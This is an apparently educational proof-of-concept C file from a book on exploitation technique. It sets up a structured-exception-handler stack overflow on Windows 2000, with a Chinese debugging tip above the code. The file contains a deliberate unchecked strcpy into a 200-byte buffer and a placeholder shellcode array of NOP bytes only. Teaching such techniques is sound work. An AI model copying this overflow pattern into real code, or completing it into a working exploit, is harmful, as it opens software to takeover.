请注意将strcpy函数提前到__asm int 3语句之前,否则在0x002FE98地址中将看不到90909090的数据,我当时就在这里被郁闷了一下午.
/*****************************************************************************
To be the apostrophe which changed "Impossible" into "I'm possible"!
POC code of chapter 7.2 in book "Vulnerability Exploit and Analysis Technique"
file name : SEH_stack.c
author : failwest
date : 2007.07.04
description : demo show of how SEH be exploited
Noticed : 1 only run on windows 2000
2 complied with VC 6.0
3 build into release version
4 SEH offset and shellcode address may need
to make sure via runtime debug
version : 1.0
E-mail : failwest@gmail.com
Only for educational purposes enjoy the fun from exploiting :)
******************************************************************************/
#include <windows.h>
char shellcode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
//"\x90\x90\x90\x90\x90\x90\x90\x90";
DWORD MyExceptionhandler(void)
{
printf("got an exception, press Enter to kill process!\n");
getchar();
ExitProcess(1);
}
void test(char * input)
{
char buf[200];
int zero=0;
strcpy(buf,input); //overrun the stack
__asm int 3 //used to break process for debug
__try
{
//strcpy(buf,input); //overrun the stack
zero=4/zero; //generate an exception
}
__except(MyExceptionhandler()){}
}
